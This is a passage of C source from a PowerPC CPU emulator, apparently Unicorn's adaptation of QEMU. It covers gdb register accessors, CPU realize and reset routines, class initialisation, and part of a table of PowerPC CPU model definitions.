gdb_get_float_reg(CPUPPCState *env, GByteArray *buf, int n) { uint8_t *mem_buf; if (n < 32) { gdb_get_reg64(buf, *cpu_fpr_ptr(env, n)); mem_buf = gdb_get_reg_ptr(buf, 8); ppc_maybe_bswap_register(env, mem_buf, 8); return 8; } if (n == 32) { gdb_get_reg32(buf, env->fpscr); mem_buf = gdb_get_reg_ptr(buf, 4); ppc_maybe_bswap_register(env, mem_buf, 4); return 4; } return 0; } static int gdb_set_float_reg(CPUPPCState *env, uint8_t *mem_buf, int n) { if (n < 32) { ppc_maybe_bswap_register(env, mem_buf, 8); *cpu_fpr_ptr(env, n) = ldfq_p(mem_buf); return 8; } if (n == 32) { ppc_maybe_bswap_register(env, mem_buf, 4); helper_store_fpscr(env, ldl_p(mem_buf), 0xffffffff); return 4; } return 0; } static int gdb_get_avr_reg(CPUPPCState *env, GByteArray *buf, int n) { uint8_t *mem_buf; if (n < 32) { ppc_avr_t *avr = cpu_avr_ptr(env, n); if (!avr_need_swap(env)) { gdb_get_reg128(buf, avr->u64[0] , avr->u64[1]); } else { gdb_get_reg128(buf, avr->u64[1] , avr->u64[0]); } mem_buf = gdb_get_reg_ptr(buf, 16); ppc_maybe_bswap_register(env, mem_buf, 8); ppc_maybe_bswap_register(env, mem_buf + 8, 8); return 16; } if (n == 32) { gdb_get_reg32(buf, helper_mfvscr(env)); mem_buf = gdb_get_reg_ptr(buf, 4); ppc_maybe_bswap_register(env, mem_buf, 4); return 4; } if (n == 33) { gdb_get_reg32(buf, (uint32_t)env->spr[SPR_VRSAVE]); mem_buf = gdb_get_reg_ptr(buf, 4); ppc_maybe_bswap_register(env, mem_buf, 4); return 4; } return 0; } static int gdb_set_avr_reg(CPUPPCState *env, uint8_t *mem_buf, int n) { if (n < 32) { ppc_avr_t *avr = cpu_avr_ptr(env, n); ppc_maybe_bswap_register(env, mem_buf, 8); ppc_maybe_bswap_register(env, mem_buf + 8, 8); if (!avr_need_swap(env)) { avr->u64[0] = ldq_p(mem_buf); avr->u64[1] = ldq_p(mem_buf + 8); } else { avr->u64[1] = ldq_p(mem_buf); avr->u64[0] = ldq_p(mem_buf + 8); } return 16; } if (n == 32) { ppc_maybe_bswap_register(env, mem_buf, 4); helper_mtvscr(env, ldl_p(mem_buf)); return 4; } if (n == 33) { ppc_maybe_bswap_register(env, mem_buf, 4); env->spr[SPR_VRSAVE] = (target_ulong)ldl_p(mem_buf); return 4; } return 0; } static int gdb_get_spe_reg(CPUPPCState *env, GByteArray *buf, int n) { if (n < 32) { #if defined(TARGET_PPC64) gdb_get_reg32(buf, env->gpr[n] >> 32); ppc_maybe_bswap_register(env, gdb_get_reg_ptr(buf, 4), 4); #else gdb_get_reg32(buf, env->gprh[n]); #endif return 4; } if (n == 32) { gdb_get_reg64(buf, env->spe_acc); ppc_maybe_bswap_register(env, gdb_get_reg_ptr(buf, 8), 8); return 8; } if (n == 33) { gdb_get_reg32(buf, env->spe_fscr); ppc_maybe_bswap_register(env, gdb_get_reg_ptr(buf, 4), 4); return 4; } return 0; } static int gdb_set_spe_reg(CPUPPCState *env, uint8_t *mem_buf, int n) { if (n < 32) { #if defined(TARGET_PPC64) target_ulong lo = (uint32_t)env->gpr[n]; target_ulong hi; ppc_maybe_bswap_register(env, mem_buf, 4); hi = (target_ulong)ldl_p(mem_buf) << 32; env->gpr[n] = lo | hi; #else env->gprh[n] = ldl_p(mem_buf); #endif return 4; } if (n == 32) { ppc_maybe_bswap_register(env, mem_buf, 8); env->spe_acc = ldq_p(mem_buf); return 8; } if (n == 33) { ppc_maybe_bswap_register(env, mem_buf, 4); env->spe_fscr = ldl_p(mem_buf); return 4; } return 0; } static int gdb_get_vsx_reg(CPUPPCState *env, GByteArray *buf, int n) { if (n < 32) { gdb_get_reg64(buf, *cpu_vsrl_ptr(env, n)); ppc_maybe_bswap_register(env, gdb_get_reg_ptr(buf, 8), 8); return 8; } return 0; } static int gdb_set_vsx_reg(CPUPPCState *env, uint8_t *mem_buf, int n) { if (n < 32) { ppc_maybe_bswap_register(env, mem_buf, 8); *cpu_vsrl_ptr(env, n) = ldq_p(mem_buf); return 8; } return 0; } #endif static int 
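#if 0
/*
 * Illustrative sketch (not built): ppc_fixup_cpu() below clamps the
 * model's instruction-group masks to what TCG actually implements --
 * a plain bitwise intersection of "what the CPU offers" and "what the
 * translator supports".
 */
static void tcg_insns_clamp_sketch(CPUPPCState *env)
{
    env->insns_flags &= PPC_TCG_INSNS;   /* drop untranslated groups */
    env->insns_flags2 &= PPC_TCG_INSNS2;
}
#endif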
ppc_fixup_cpu(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; /* * TCG doesn't (yet) emulate some groups of instructions that are * implemented on some otherwise supported CPUs (e.g. VSX and * decimal floating point instructions on POWER7). We remove * unsupported instruction groups from the cpu state's instruction * masks and hope the guest can cope. For at least the pseries * machine, the unavailability of these instructions can be * advertised to the guest via the device tree. */ if ((env->insns_flags & ~PPC_TCG_INSNS) || (env->insns_flags2 & ~PPC_TCG_INSNS2)) { #if 0 warn_report("Disabling some instructions which are not " "emulated by TCG (0x%" PRIx64 ", 0x%" PRIx64 ")", env->insns_flags & ~PPC_TCG_INSNS, env->insns_flags2 & ~PPC_TCG_INSNS2); #endif } env->insns_flags &= PPC_TCG_INSNS; env->insns_flags2 &= PPC_TCG_INSNS2; return 0; } static void ppc_cpu_realize(struct uc_struct *uc, CPUState *dev) { CPUState *cs = CPU(dev); PowerPCCPU *cpu = POWERPC_CPU(dev); #if 0 PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); #endif cpu_exec_realizefn(cs); if (cpu->vcpu_id == UNASSIGNED_CPU_INDEX) { cpu->vcpu_id = cs->cpu_index; } if (ppc_fixup_cpu(cpu) != 0) { goto unrealize; } if (create_ppc_opcodes(cpu) != 0) { goto unrealize; } init_ppc_proc(cpu); #if defined(PPC_DUMP_CPU) { CPUPPCState *env = &cpu->env; const char *mmu_model, *excp_model, *bus_model; switch (env->mmu_model) { case POWERPC_MMU_32B: mmu_model = "PowerPC 32"; break; case POWERPC_MMU_SOFT_6xx: mmu_model = "PowerPC 6xx/7xx with software driven TLBs"; break; case POWERPC_MMU_SOFT_74xx: mmu_model = "PowerPC 74xx with software driven TLBs"; break; case POWERPC_MMU_SOFT_4xx: mmu_model = "PowerPC 4xx with software driven TLBs"; break; case POWERPC_MMU_SOFT_4xx_Z: mmu_model = "PowerPC 4xx with software driven TLBs " "and zones protections"; break; case POWERPC_MMU_REAL: mmu_model = "PowerPC real mode only"; break; case POWERPC_MMU_MPC8xx: mmu_model = "PowerPC MPC8xx"; break; case POWERPC_MMU_BOOKE: mmu_model = "PowerPC BookE"; break; case POWERPC_MMU_BOOKE206: mmu_model = "PowerPC BookE 2.06"; break; case POWERPC_MMU_601: mmu_model = "PowerPC 601"; break; #if defined(TARGET_PPC64) case POWERPC_MMU_64B: mmu_model = "PowerPC 64"; break; #endif default: mmu_model = "Unknown or invalid"; break; } switch (env->excp_model) { case POWERPC_EXCP_STD: excp_model = "PowerPC"; break; case POWERPC_EXCP_40x: excp_model = "PowerPC 40x"; break; case POWERPC_EXCP_601: excp_model = "PowerPC 601"; break; case POWERPC_EXCP_602: excp_model = "PowerPC 602"; break; case POWERPC_EXCP_603: excp_model = "PowerPC 603"; break; case POWERPC_EXCP_603E: excp_model = "PowerPC 603e"; break; case POWERPC_EXCP_604: excp_model = "PowerPC 604"; break; case POWERPC_EXCP_7x0: excp_model = "PowerPC 740/750"; break; case POWERPC_EXCP_7x5: excp_model = "PowerPC 745/755"; break; case POWERPC_EXCP_74xx: excp_model = "PowerPC 74xx"; break; case POWERPC_EXCP_BOOKE: excp_model = "PowerPC BookE"; break; #if defined(TARGET_PPC64) case POWERPC_EXCP_970: excp_model = "PowerPC 970"; break; #endif default: excp_model = "Unknown or invalid"; break; } switch (env->bus_model) { case PPC_FLAGS_INPUT_6xx: bus_model = "PowerPC 6xx"; break; case PPC_FLAGS_INPUT_BookE: bus_model = "PowerPC BookE"; break; case PPC_FLAGS_INPUT_405: bus_model = "PowerPC 405"; break; case PPC_FLAGS_INPUT_401: bus_model = "PowerPC 401/403"; break; case PPC_FLAGS_INPUT_RCPU: bus_model = "RCPU / MPC8xx"; break; #if defined(TARGET_PPC64) case PPC_FLAGS_INPUT_970: bus_model = "PowerPC 970"; break; #endif default: 
bus_model = "Unknown or invalid"; break; } printf("PowerPC %-12s : PVR %08x MSR %016" PRIx64 "\n" " MMU model : %s\n", object_class_get_name(OBJECT_CLASS(pcc)), pcc->pvr, pcc->msr_mask, mmu_model); if (env->tlb.tlb6) { printf(" %d %s TLB in %d ways\n", env->nb_tlb, env->id_tlbs ? "splitted" : "merged", env->nb_ways); } printf(" Exceptions model : %s\n" " Bus model : %s\n", excp_model, bus_model); printf(" MSR features :\n"); if (env->flags & POWERPC_FLAG_SPE) { printf(" signal processing engine enable" "\n"); } else if (env->flags & POWERPC_FLAG_VRE) { printf(" vector processor enable\n"); } if (env->flags & POWERPC_FLAG_TGPR) { printf(" temporary GPRs\n"); } else if (env->flags & POWERPC_FLAG_CE) { printf(" critical input enable\n"); } if (env->flags & POWERPC_FLAG_SE) { printf(" single-step trace mode\n"); } else if (env->flags & POWERPC_FLAG_DWE) { printf(" debug wait enable\n"); } else if (env->flags & POWERPC_FLAG_UBLE) { printf(" user BTB lock enable\n"); } if (env->flags & POWERPC_FLAG_BE) { printf(" branch-step trace mode\n"); } else if (env->flags & POWERPC_FLAG_DE) { printf(" debug interrupt enable\n"); } if (env->flags & POWERPC_FLAG_PX) { printf(" inclusive protection\n"); } else if (env->flags & POWERPC_FLAG_PMM) { printf(" performance monitor mark\n"); } if (env->flags == POWERPC_FLAG_NONE) { printf(" none\n"); } printf(" Time-base/decrementer clock source: %s\n", env->flags & POWERPC_FLAG_RTC_CLK ? "RTC clock" : "bus clock"); dump_ppc_insns(env); dump_ppc_sprs(env); fflush(stdout); } #endif return; unrealize: cpu_exec_unrealizefn(cs); } void ppc_cpu_unrealize(CPUState *dev) { PowerPCCPU *cpu = POWERPC_CPU(dev); opc_handler_t **table, **table_2; int i, j, k; for (i = 0; i < PPC_CPU_OPCODES_LEN; i++) { if (cpu->opcodes[i] == &invalid_handler) { continue; } if (is_indirect_opcode(cpu->opcodes[i])) { table = ind_table(cpu->opcodes[i]); for (j = 0; j < PPC_CPU_INDIRECT_OPCODES_LEN; j++) { if (table[j] == &invalid_handler) { continue; } if (is_indirect_opcode(table[j])) { table_2 = ind_table(table[j]); for (k = 0; k < PPC_CPU_INDIRECT_OPCODES_LEN; k++) { if (table_2[k] != &invalid_handler && is_indirect_opcode(table_2[k])) { g_free((opc_handler_t *)((uintptr_t)table_2[k] & ~PPC_INDIRECT)); } } g_free((opc_handler_t *)((uintptr_t)table[j] & ~PPC_INDIRECT)); } } g_free((opc_handler_t *)((uintptr_t)cpu->opcodes[i] & ~PPC_INDIRECT)); } } } static void ppc_cpu_set_pc(CPUState *cs, vaddr value) { PowerPCCPU *cpu = POWERPC_CPU(cs); cpu->env.nip = value; } static bool ppc_cpu_has_work(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; return msr_ee && (cs->interrupt_request & CPU_INTERRUPT_HARD); } static void ppc_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); PowerPCCPU *cpu = POWERPC_CPU(s); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); CPUPPCState *env = &cpu->env; target_ulong msr; int i; pcc->parent_reset(dev); msr = (target_ulong)0; msr |= (target_ulong)MSR_HVB; msr |= (target_ulong)0 << MSR_AP; /* TO BE CHECKED */ msr |= (target_ulong)0 << MSR_SA; /* TO BE CHECKED */ msr |= (target_ulong)1 << MSR_EP; #if defined(DO_SINGLE_STEP) && 0 /* Single step trace mode */ msr |= (target_ulong)1 << MSR_SE; msr |= (target_ulong)1 << MSR_BE; #endif #if defined(TARGET_PPC64) if (env->mmu_model & POWERPC_MMU_64) { msr |= (1ULL << MSR_SF); } #endif hreg_store_msr(env, msr, 1); env->nip = env->hreset_vector | env->excp_prefix; if (env->mmu_model != POWERPC_MMU_REAL) { ppc_tlb_invalidate_all(env); } hreg_compute_hflags(env); #ifdef _MSC_VER env->reserve_addr = 
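/* all-ones "invalid" sentinel; spelled 0ULL - 1ULL presumably to avoid MSVC's C4146 warning about negating an unsigned value */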
(target_ulong)(0ULL - 1ULL); #else env->reserve_addr = (target_ulong)-1ULL; #endif /* Be sure no exception or interrupt is pending */ env->pending_interrupts = 0; s->exception_index = POWERPC_EXCP_NONE; env->error_code = 0; ppc_irq_reset(cpu); /* tininess for underflow is detected before rounding */ set_float_detect_tininess(float_tininess_before_rounding, &env->fp_status); for (i = 0; i < ARRAY_SIZE(env->spr_cb); i++) { ppc_spr_t *spr = &env->spr_cb[i]; if (!spr->name) { continue; } env->spr[i] = spr->default_value; } } #if 0 static bool ppc_cpu_is_big_endian(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; // cpu_synchronize_state(cs); return !msr_le; } #endif static void ppc_cpu_exec_enter(CPUState *cs) { #if 0 PowerPCCPU *cpu = POWERPC_CPU(cs); if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->cpu_exec_enter(cpu->vhyp, cpu); } #endif } static void ppc_cpu_exec_exit(CPUState *cs) { #if 0 PowerPCCPU *cpu = POWERPC_CPU(cs); if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->cpu_exec_exit(cpu->vhyp, cpu); } #endif } static void ppc_cpu_instance_init(struct uc_struct *uc, CPUState *obj) { PowerPCCPU *cpu = POWERPC_CPU(obj); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); CPUPPCState *env = &cpu->env; env->uc = uc; cpu_set_cpustate_pointers(cpu); cpu->vcpu_id = UNASSIGNED_CPU_INDEX; env->msr_mask = pcc->msr_mask; env->mmu_model = pcc->mmu_model; env->excp_model = pcc->excp_model; env->bus_model = pcc->bus_model; env->insns_flags = pcc->insns_flags; env->insns_flags2 = pcc->insns_flags2; env->flags = pcc->flags; env->check_pow = pcc->check_pow; /* * Mark HV mode as supported if the CPU has an MSR_HV bit in the * msr_mask. The mask can later be cleared by PAPR mode but the hv * mode support will remain, thus enforcing that we cannot use * priv. instructions in guest in PAPR mode. For 970 we currently * simply don't set HV in msr_mask thus simulating an "Apple mode" * 970. If we ever want to support 970 HV mode, we'll have to add * a processor attribute of some sort. */ env->has_hv_mode = !!(env->msr_mask & MSR_HVB); #ifdef TARGET_PPC64 ppc_hash64_init(cpu); #endif } void ppc_cpu_instance_finalize(CPUState *obj) { #ifdef TARGET_PPC64 PowerPCCPU *cpu = POWERPC_CPU(obj); ppc_hash64_finalize(cpu); #endif } static bool ppc_pvr_match_default(PowerPCCPUClass *pcc, uint32_t pvr) { return pcc->pvr == pvr; } static void ppc_cpu_class_init(struct uc_struct *uc, CPUClass *oc) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); pcc->pvr_match = ppc_pvr_match_default; pcc->interrupts_big_endian = ppc_cpu_interrupts_big_endian_always; /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */ pcc->parent_reset = cc->reset; /* override CPUClass->reset with the arch-specific reset: ppc_cpu_reset(). 
*/ cc->reset = ppc_cpu_reset; cc->has_work = ppc_cpu_has_work; cc->do_interrupt = ppc_cpu_do_interrupt; cc->cpu_exec_interrupt = ppc_cpu_exec_interrupt; cc->set_pc = ppc_cpu_set_pc; cc->do_unaligned_access = ppc_cpu_do_unaligned_access; cc->get_phys_page_debug = ppc_cpu_get_phys_page_debug; cc->tcg_initialize = ppc_translate_init; cc->tlb_fill_cpu = ppc_cpu_tlb_fill; cc->cpu_exec_enter = ppc_cpu_exec_enter; cc->cpu_exec_exit = ppc_cpu_exec_exit; } /* PowerPC CPU definitions from cpu-models.c*/ typedef struct PowerPCCPUInfo { const char *name; uint32_t pvr; uint32_t svr; void (*cpu_family_class_init)(CPUClass *oc, void *data); } PowerPCCPUInfo; #define POWERPC_DEF_SVR(_name, _desc, _pvr, _svr, _type) \ { _name, _pvr, _svr, POWERPC_FAMILY_NAME(_type) }, #define POWERPC_DEF(_name, _pvr, _type, _desc) \ POWERPC_DEF_SVR(_name, _desc, _pvr, POWERPC_SVR_NONE, _type) static const PowerPCCPUInfo ppc_cpus[] = { /* Embedded PowerPC */ /* PowerPC 401 family */ POWERPC_DEF("401", CPU_POWERPC_401, 401, "Generic PowerPC 401") /* PowerPC 401 cores */ POWERPC_DEF("401a1", CPU_POWERPC_401A1, 401, "PowerPC 401A1") POWERPC_DEF("401b2", CPU_POWERPC_401B2, 401x2, "PowerPC 401B2") POWERPC_DEF("401c2", CPU_POWERPC_401C2, 401x2, "PowerPC 401C2") POWERPC_DEF("401d2", CPU_POWERPC_401D2, 401x2, "PowerPC 401D2") POWERPC_DEF("401e2", CPU_POWERPC_401E2, 401x2, "PowerPC 401E2") POWERPC_DEF("401f2", CPU_POWERPC_401F2, 401x2, "PowerPC 401F2") /* XXX: to be checked */ POWERPC_DEF("401g2", CPU_POWERPC_401G2, 401x2, "PowerPC 401G2") /* PowerPC 401 microcontrollers */ POWERPC_DEF("iop480", CPU_POWERPC_IOP480, IOP480, "IOP480 (401 microcontroller)") POWERPC_DEF("cobra", CPU_POWERPC_COBRA, 401, "IBM Processor for Network Resources") /* PowerPC 403 family */ /* PowerPC 403 microcontrollers */ POWERPC_DEF("403ga", CPU_POWERPC_403GA, 403, "PowerPC 403 GA") POWERPC_DEF("403gb", CPU_POWERPC_403GB, 403, "PowerPC 403 GB") POWERPC_DEF("403gc", CPU_POWERPC_403GC, 403, "PowerPC 403 GC") POWERPC_DEF("403gcx", CPU_POWERPC_403GCX, 403GCX, "PowerPC 403 GCX") /* PowerPC 405 family */ /* PowerPC 405 cores */ POWERPC_DEF("405d2", CPU_POWERPC_405D2, 405, "PowerPC 405 D2") POWERPC_DEF("405d4", CPU_POWERPC_405D4, 405, "PowerPC 405 D4") /* PowerPC 405 microcontrollers */ POWERPC_DEF("405cra", CPU_POWERPC_405CRa, 405, "PowerPC 405 CRa") POWERPC_DEF("405crb", CPU_POWERPC_405CRb, 405, "PowerPC 405 CRb") POWERPC_DEF("405crc", CPU_POWERPC_405CRc, 405, "PowerPC 405 CRc") POWERPC_DEF("405ep", CPU_POWERPC_405EP, 405, "PowerPC 405 EP") POWERPC_DEF("405ez", CPU_POWERPC_405EZ, 405, "PowerPC 405 EZ") POWERPC_DEF("405gpa", CPU_POWERPC_405GPa, 405, "PowerPC 405 GPa") POWERPC_DEF("405gpb", CPU_POWERPC_405GPb, 405, "PowerPC 405 GPb") POWERPC_DEF("405gpc", CPU_POWERPC_405GPc, 405, "PowerPC 405 GPc") POWERPC_DEF("405gpd", CPU_POWERPC_405GPd, 405, "PowerPC 405 GPd") POWERPC_DEF("405gpr", CPU_POWERPC_405GPR, 405, "PowerPC 405 GPR") POWERPC_DEF("405lp", CPU_POWERPC_405LP, 405, "PowerPC 405 LP") POWERPC_DEF("npe405h", CPU_POWERPC_NPE405H, 405, "Npe405 H") POWERPC_DEF("npe405h2", CPU_POWERPC_NPE405H2, 405, "Npe405 H2") POWERPC_DEF("npe405l", CPU_POWERPC_NPE405L, 405, "Npe405 L") POWERPC_DEF("npe4gs3", CPU_POWERPC_NPE4GS3, 405, "Npe4GS3") /* PowerPC 401/403/405 based set-top-box microcontrollers */ POWERPC_DEF("stb03", CPU_POWERPC_STB03, 405, "STB03xx") POWERPC_DEF("stb04", CPU_POWERPC_STB04, 405, "STB04xx") POWERPC_DEF("stb25", CPU_POWERPC_STB25, 405, "STB25xx") /* Xilinx PowerPC 405 cores */ POWERPC_DEF("x2vp4", CPU_POWERPC_X2VP4, 405, NULL) POWERPC_DEF("x2vp20", 
CPU_POWERPC_X2VP20, 405, NULL) /* PowerPC 440 family */ #if defined(TODO_USER_ONLY) POWERPC_DEF("440", CPU_POWERPC_440, 440GP, "Generic PowerPC 440") #endif /* PowerPC 440 cores */ POWERPC_DEF("440-xilinx", CPU_POWERPC_440_XILINX, 440x5, "PowerPC 440 Xilinx 5") POWERPC_DEF("440-xilinx-w-dfpu", CPU_POWERPC_440_XILINX, 440x5wDFPU, "PowerPC 440 Xilinx 5 With a Double Prec. FPU") /* PowerPC 440 microcontrollers */ POWERPC_DEF("440epa", CPU_POWERPC_440EPa, 440EP, "PowerPC 440 EPa") POWERPC_DEF("440epb", CPU_POWERPC_440EPb, 440EP, "PowerPC 440 EPb") POWERPC_DEF("440epx", CPU_POWERPC_440EPX, 440EP, "PowerPC 440 EPX") POWERPC_DEF("460exb", CPU_POWERPC_460EXb, 460EX, "PowerPC 460 EXb") #if defined(TODO_USER_ONLY) POWERPC_DEF("440gpb", CPU_POWERPC_440GPb, 440GP, "PowerPC 440 GPb") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gpc", CPU_POWERPC_440GPc, 440GP, "PowerPC 440 GPc") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gra", CPU_POWERPC_440GRa, 440x5, "PowerPC 440 GRa") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440grx", CPU_POWERPC_440GRX, 440x5, "PowerPC 440 GRX") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxa", CPU_POWERPC_440GXa, 440EP, "PowerPC 440 GXa") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxb", CPU_POWERPC_440GXb, 440EP, "PowerPC 440 GXb") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxc", CPU_POWERPC_440GXc, 440EP, "PowerPC 440 GXc") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxf", CPU_POWERPC_440GXf, 440EP, "PowerPC 440 GXf") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440sp", CPU_POWERPC_440SP, 440EP, "PowerPC 440 SP") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440sp2", CPU_POWERPC_440SP2, 440EP, "PowerPC 440 SP2") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440spe", CPU_POWERPC_440SPE, 440EP, "PowerPC 440 SPE") #endif /* Freescale embedded PowerPC cores */ /* MPC5xx family (aka RCPU) */ #if defined(TODO_USER_ONLY) POWERPC_DEF("mpc5xx", CPU_POWERPC_MPC5xx, MPC5xx, "Generic MPC5xx core") #endif /* MPC8xx family (aka PowerQUICC) */ #if defined(TODO_USER_ONLY) POWERPC_DEF("mpc8xx", CPU_POWERPC_MPC8xx, MPC8xx, "Generic MPC8xx core") #endif /* MPC82xx family (aka PowerQUICC-II) */ POWERPC_DEF("g2", CPU_POWERPC_G2, G2, "PowerPC G2 core") POWERPC_DEF("g2h4", CPU_POWERPC_G2H4, G2, "PowerPC G2 H4 core") POWERPC_DEF("g2gp", CPU_POWERPC_G2gp, G2, "PowerPC G2 GP core") POWERPC_DEF("g2ls", CPU_POWERPC_G2ls, G2, "PowerPC G2 LS core") POWERPC_DEF("g2hip3", CPU_POWERPC_G2_HIP3, G2, "PowerPC G2 HiP3 core") POWERPC_DEF("g2hip4", CPU_POWERPC_G2_HIP4, G2, "PowerPC G2 HiP4 core") POWERPC_DEF("mpc603", CPU_POWERPC_MPC603, 603E, "PowerPC MPC603 core") POWERPC_DEF("g2le", CPU_POWERPC_G2LE, G2LE, "PowerPC G2le core (same as G2 plus little-endian mode support)") POWERPC_DEF("g2legp", CPU_POWERPC_G2LEgp, G2LE, "PowerPC G2LE GP core") POWERPC_DEF("g2lels", CPU_POWERPC_G2LEls, G2LE, "PowerPC G2LE LS core") POWERPC_DEF("g2legp1", CPU_POWERPC_G2LEgp1, G2LE, "PowerPC G2LE GP1 core") POWERPC_DEF("g2legp3", CPU_POWERPC_G2LEgp3, G2LE, "PowerPC G2LE GP3 core") /* PowerPC G2 microcontrollers */ POWERPC_DEF_SVR("mpc5200_v10", "MPC5200 v1.0", CPU_POWERPC_MPC5200_v10, POWERPC_SVR_5200_v10, G2LE) POWERPC_DEF_SVR("mpc5200_v11", "MPC5200 v1.1", CPU_POWERPC_MPC5200_v11, POWERPC_SVR_5200_v11, G2LE) POWERPC_DEF_SVR("mpc5200_v12", "MPC5200 v1.2", CPU_POWERPC_MPC5200_v12, POWERPC_SVR_5200_v12, G2LE) POWERPC_DEF_SVR("mpc5200b_v20", "MPC5200B v2.0", CPU_POWERPC_MPC5200B_v20, POWERPC_SVR_5200B_v20, G2LE) POWERPC_DEF_SVR("mpc5200b_v21", "MPC5200B v2.1", 
CPU_POWERPC_MPC5200B_v21, POWERPC_SVR_5200B_v21, G2LE) /* e200 family */ POWERPC_DEF("e200z5", CPU_POWERPC_e200z5, e200, "PowerPC e200z5 core") POWERPC_DEF("e200z6", CPU_POWERPC_e200z6, e200, "PowerPC e200z6 core") /* e300 family */ POWERPC_DEF("e300c1", CPU_POWERPC_e300c1, e300, "PowerPC e300c1 core") POWERPC_DEF("e300c2", CPU_POWERPC_e300c2, e300, "PowerPC e300c2 core") POWERPC_DEF("e300c3", CPU_POWERPC_e300c3, e300, "PowerPC e300c3 core") POWERPC_DEF("e300c4", CPU_POWERPC_e300c4, e300, "PowerPC e300c4 core") /* PowerPC e300 microcontrollers */ POWERPC_DEF_SVR("mpc8343", "MPC8343", CPU_POWERPC_MPC834x, POWERPC_SVR_8343, e300) POWERPC_DEF_SVR("mpc8343a", "MPC8343A", CPU_POWERPC_MPC834x, POWERPC_SVR_8343A, e300) POWERPC_DEF_SVR("mpc8343e", "MPC8343E", CPU_POWERPC_MPC834x, POWERPC_SVR_8343E, e300) POWERPC_DEF_SVR("mpc8343ea", "MPC8343EA", CPU_POWERPC_MPC834x, POWERPC_SVR_8343EA, e300) POWERPC_DEF_SVR("mpc8347t", "MPC8347T", CPU_POWERPC_MPC834x, POWERPC_SVR_8347T, e300) POWERPC_DEF_SVR("mpc8347p", "MPC8347P", CPU_POWERPC_MPC834x, POWERPC_SVR_8347P, e300) POWERPC_DEF_SVR("mpc8347at", "MPC8347AT", CPU_POWERPC_MPC834x, POWERPC_SVR_8347AT, e300) POWERPC_DEF_SVR("mpc8347ap", "MPC8347AP", CPU_POWERPC_MPC834x, POWERPC_SVR_8347AP, e300) POWERPC_DEF_SVR("mpc8347et", "MPC8347ET", CPU_POWERPC_MPC834x, POWERPC_SVR_8347ET, e300) POWERPC_DEF_SVR("mpc8347ep", "MPC8347EP", CPU_POWERPC_MPC834x, POWERPC_SVR_8347EP, e300) POWERPC_DEF_SVR("mpc8347eat", "MPC8347EAT", CPU_POWERPC_MPC834x, POWERPC_SVR_8347EAT, e300) POWERPC_DEF_SVR("mpc8347eap", "MPC8347EAP", CPU_POWERPC_MPC834x, POWERPC_SVR_8347EAP, e300) POWERPC_DEF_SVR("mpc8349", "MPC8349", CPU_POWERPC_MPC834x, POWERPC_SVR_8349, e300) POWERPC_DEF_SVR("mpc8349a", "MPC8349A", CPU_POWERPC_MPC834x, POWERPC_SVR_8349A, e300) POWERPC_DEF_SVR("mpc8349e", "MPC8349E", CPU_POWERPC_MPC834x, POWERPC_SVR_8349E, e300) POWERPC_DEF_SVR("mpc8349ea", "MPC8349EA", CPU_POWERPC_MPC834x, POWERPC_SVR_8349EA, e300) POWERPC_DEF_SVR("mpc8377", "MPC8377", CPU_POWERPC_MPC837x, POWERPC_SVR_8377, e300) POWERPC_DEF_SVR("mpc8377e", "MPC8377E", CPU_POWERPC_MPC837x, POWERPC_SVR_8377E, e300) POWERPC_DEF_SVR("mpc8378", "MPC8378", CPU_POWERPC_MPC837x, POWERPC_SVR_8378, e300) POWERPC_DEF_SVR("mpc8378e", "MPC8378E", CPU_POWERPC_MPC837x, POWERPC_SVR_8378E, e300) POWERPC_DEF_SVR("mpc8379", "MPC8379", CPU_POWERPC_MPC837x, POWERPC_SVR_8379, e300) POWERPC_DEF_SVR("mpc8379e", "MPC8379E", CPU_POWERPC_MPC837x, POWERPC_SVR_8379E, e300) /* e500 family */ POWERPC_DEF_SVR("e500_v10", "PowerPC e500 v1.0 core", CPU_POWERPC_e500v1_v10, POWERPC_SVR_E500, e500v1) POWERPC_DEF_SVR("e500_v20", "PowerPC e500 v2.0 core", CPU_POWERPC_e500v1_v20, POWERPC_SVR_E500, e500v1) POWERPC_DEF_SVR("e500v2_v10", "PowerPC e500v2 v1.0 core", CPU_POWERPC_e500v2_v10, POWERPC_SVR_E500, e500v2) POWERPC_DEF_SVR("e500v2_v20", "PowerPC e500v2 v2.0 core", CPU_POWERPC_e500v2_v20, POWERPC_SVR_E500, e500v2) POWERPC_DEF_SVR("e500v2_v21", "PowerPC e500v2 v2.1 core", CPU_POWERPC_e500v2_v21, POWERPC_SVR_E500, e500v2) POWERPC_DEF_SVR("e500v2_v22", "PowerPC e500v2 v2.2 core", CPU_POWERPC_e500v2_v22, POWERPC_SVR_E500, e500v2) POWERPC_DEF_SVR("e500v2_v30", "PowerPC e500v2 v3.0 core", CPU_POWERPC_e500v2_v30, POWERPC_SVR_E500, e500v2) POWERPC_DEF_SVR("e500mc", "e500mc", CPU_POWERPC_e500mc, POWERPC_SVR_E500, e500mc) /* PowerPC e500 microcontrollers */ POWERPC_DEF_SVR("mpc8533_v10", "MPC8533 v1.0", CPU_POWERPC_MPC8533_v10, POWERPC_SVR_8533_v10, e500v2) POWERPC_DEF_SVR("mpc8533_v11", "MPC8533 v1.1", CPU_POWERPC_MPC8533_v11, 